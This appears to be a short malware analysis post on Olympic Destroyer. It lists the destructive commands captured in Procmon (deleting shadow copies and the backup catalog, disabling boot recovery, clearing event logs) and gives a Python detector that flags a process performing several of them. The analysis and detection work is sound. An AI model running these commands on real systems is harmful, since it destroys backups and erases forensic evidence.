Malware Analysis — Olympic Destroyer

Image from WIRED article. Illustration: Joan Wong

PEStudio:

IDA:

Dynamic Analysis of Olympic Destroyer

Procmon:

FXRBH.exe

_exw.exe

C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security

_stt.exe

_gur.exe

System Stealer
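The five command lines captured in Procmon above are the destructive stage of Olympic Destroyer: shadow copies and the backup catalog are deleted, Windows recovery is switched off, and the System and Security event logs are cleared. The following is an added example, not code from the original post: a small detector that reads process-creation records, unwraps the "cmd.exe /c" wrapper, splits "&"-chained commands, matches each segment against the anti-recovery and log-clearing patterns shown, and flags a parent process that performs several distinct such actions. The record format ("ParentImage: ... | CommandLine: ..."), the parent path C:\Temp\_exw.exe and the benign lines are constructed for the example; only the command lines themselves come from the capture.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Set

# Constructed sample records (not from the page). Each mimics the two fields of a
# Sysmon Event ID 1 / Procmon "Process Create" record that matter here. The parent
# path C:\Temp\_exw.exe is an assumption for the example; the command lines are
# the ones shown in the Procmon capture.
SAMPLE_LOG = [
    r"ParentImage: C:\Temp\_exw.exe | CommandLine: C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet",
    r"ParentImage: C:\Temp\_exw.exe | CommandLine: C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet",
    r"ParentImage: C:\Temp\_exw.exe | CommandLine: C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no",
    r"ParentImage: C:\Temp\_exw.exe | CommandLine: C:\Windows\system32\cmd.exe /c wevtutil.exe cl System",
    r"ParentImage: C:\Temp\_exw.exe | CommandLine: C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security",
    # Constructed benign records: an admin listing shadow copies, and a normal user process.
    r"ParentImage: C:\Windows\explorer.exe | CommandLine: C:\Windows\system32\cmd.exe /c vssadmin.exe list shadows",
    r"ParentImage: C:\Windows\explorer.exe | CommandLine: C:\Windows\system32\notepad.exe notes.txt",
]

# One rule per anti-recovery / anti-forensics action seen in the capture.
# "vssadmin list shadows" deliberately does not match: only deletion is of interest.
RULES = [
    ("shadow_copies_deleted", re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I)),
    ("backup_catalog_deleted", re.compile(r"\bwbadmin(?:\.exe)?\s+delete\s+catalog\b", re.I)),
    ("boot_failures_ignored", re.compile(r"\bbcdedit(?:\.exe)?\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures\b", re.I)),
    ("recovery_disabled", re.compile(r"\bbcdedit(?:\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no\b", re.I)),
    ("event_log_cleared", re.compile(r"\bwevtutil(?:\.exe)?\s+cl\s+(?:System|Security|Application)\b", re.I)),
]

FIELD_RE = re.compile(r"ParentImage:\s*(?P<parent>.*?)\s*\|\s*CommandLine:\s*(?P<cmd>.*)$")
CMD_WRAPPER_RE = re.compile(r"^\S*cmd(?:\.exe)?\s+/c\s+", re.I)
CHAIN_SPLIT_RE = re.compile(r"\s*(?:&&|\|\||&)\s*")


@dataclass(frozen=True)
class Finding:
    parent: str   # process that spawned the command
    rule: str     # name of the matched rule
    command: str  # the individual command segment that matched


def split_chain(cmd: str) -> List[str]:
    """Strip a leading 'cmd.exe /c' wrapper and split '&'/'&&'/'||' chains into segments.

    The bcdedit line in the capture chains two commands with '&'; scanning the
    whole string once would otherwise report only one of them.
    """
    body = CMD_WRAPPER_RE.sub("", cmd)
    return [seg for seg in CHAIN_SPLIT_RE.split(body) if seg]


def scan_line(line: str) -> List[Finding]:
    """Match every command segment of one record against every rule."""
    m = FIELD_RE.search(line)
    if not m:
        return []
    findings = []
    for segment in split_chain(m["cmd"]):
        for name, pattern in RULES:
            if pattern.search(segment):
                findings.append(Finding(m["parent"], name, segment))
    return findings


def scan_log(lines: List[str]) -> List[Finding]:
    return [f for line in lines for f in scan_line(line)]


def rules_by_parent(findings: List[Finding]) -> Dict[str, Set[str]]:
    """Group the distinct rule names triggered by each parent process."""
    grouped: Dict[str, Set[str]] = {}
    for f in findings:
        grouped.setdefault(f.parent, set()).add(f.rule)
    return grouped


def destructive_parents(findings: List[Finding], threshold: int = 2) -> List[str]:
    """Parents that performed at least `threshold` distinct anti-recovery actions.

    A single hit can be legitimate administration (e.g. clearing an old shadow set),
    so the alert is raised on the combination, which is what the capture shows.
    """
    return sorted(p for p, rules in rules_by_parent(findings).items() if len(rules) >= threshold)


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f.parent}: {f.rule} <- {f.command}")
    print("destructive parents:", destructive_parents(hits))
```

The chain splitting matters because the third captured line carries two bcdedit changes in one process creation; a rule applied to the unsplit string would still match, but the per-parent count used for the alert would under-report by one. The threshold keeps an isolated vssadmin or wevtutil use from alerting on its own while the full sequence seen here trips it immediately.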

Jon